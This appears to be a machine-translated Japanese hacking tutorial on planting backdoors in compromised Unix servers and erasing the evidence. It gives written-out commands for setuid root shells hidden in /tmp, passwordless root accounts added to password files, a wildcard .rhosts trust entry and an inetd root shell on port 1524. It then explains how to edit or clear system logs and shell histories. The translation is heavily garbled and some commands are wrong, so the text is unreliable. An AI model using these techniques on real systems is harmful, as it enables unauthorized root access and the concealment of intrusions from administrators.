システムの裏手とログの消去


せっかくサーバーを作ったのですから、見つけられたらないです。残念ですね
裏口をつける方法はいろいろあります。
1. setuid 
湖南省にある地名 /bin/sh /tmp/.sh
同前 u+s /tmp/.sh
加えて suid shellに席を置くのは簡単ですが、見つけられやすいです。 
2. echo "hack::0:0:://bin/csh" >> /etc/passwd
システムに一つ追加します。 id。 を選択します 0(root)のアカウントは、パスワードがありません。
でも管理人はすぐに見つけられますよ。
3.echo "++">>/.rhosts 
このシステムが512,513のポートを開いたらいいです。 
hackという名前を.rhostsファイルに登録します。パスワードは要りません。 
4.変更 sendmail.cfファイル 「wiz」を追加します コマンド 
そしてホテルで wwww.xx.com 25後、wiz。。。。OK。 
 
5です。 既存のユーザパスワードを変更します。
もしホストに多くのユーザーがいるなら、ユーザーが長い間ログインしていないのを見たら、彼のパスワードを変更できます。
同前 passwdコマンドが使用できます。
6.rootkitバックドアバッグ 
インターネットでダウンロードするところがたくさんあります。探してみて、自分で試してみます。私もテスト中です。まさか!!!
-Bsd 裏門:
echo love:92:206:0:0:0://bin/sh >> /etc/master.passwd 
//usr/sbin/pwd_mkdb /etc/master.passwd 
ここで私が追加したloveのユーザIDは92です。ROOTは0ですよ 
はい、ユーザーを追加します。じゃ権限が足りないですが、どうすればいいですか? 
cp /bin/sh /tmp/.x (このxは適当に選んでください。 .sh , .a. , .b など)
chmod 777 /tmp/.x
chmod +s /tmp/.x
これを使って彼の裏口を作ってあげましょう。
これから登録したこの肉鶏は後でtmp/xで権限を高めることができます。
-AIX 裏門 (Kelvinzhooが教えてくれました。ありがとうございます。
echo "イングレスロック ストリーム tcp nowait root /bin/sh'>/tmp/.x 
//usr/sbin/inetd -s /tmp/.x 
rm /tmp/.x 
これでホテルに着けます。 ip 1524直接rootshellを得る 
-SunOs 裏門
echo "love::0:0://bin/bash" >> /etc/passwd
echo "love:::::" >> /etc/show 
あなたがtelnetで行く時、あなたはrootです。でも、保険はありません
-Linux 裏門
echo "love::0:0://bin/bash" >> /etc/passwd
echo "love:::::" >> /etc/show 
時間があれば、裏口をいくつか残してください。
裏口を残したらあなたのPPを拭きます。違います。これも忘れました。
Unixシステムログファイルは通常保存されます。 "/var/log and /var/adm" 目次の下の。一般的にsylog.com nfを見て、ログの構成状況を見ることができます。例えば、cat。 /etc/syslog.com nf
一般的に私達がクリアしたいログはありますか? 
lastlog 
mp 
wtmp 
メッセージ 
syslog 
sulog 
また、各種のshellは、ユーザが使用するコマンド履歴も記録しています。これらのコマンド履歴は、ユーザのホームディレクトリのファイルを使用して記録されています。通常、このファイルの名前はsh_です。history (ksh).history (sh,またはbash_history (bash等。 
wipe.cのようなものがあれば そのようなログをクリアするプログラムは、それを行うことができます。さもなければ手動で行う必要があります。 rmを使って日誌を落とさないように提案します。日誌を改編したほうがいいです。
たとえば: 
同前 > /usr/log/lastlogs 
->ここはあなたが書くものです。入力しなくてもいいですよ。
ここの^dはボタンです。 ctrl + d! 終わり!
同前
はい、言わないでください。もっと勉強したいです。私も料理がおいしいです。see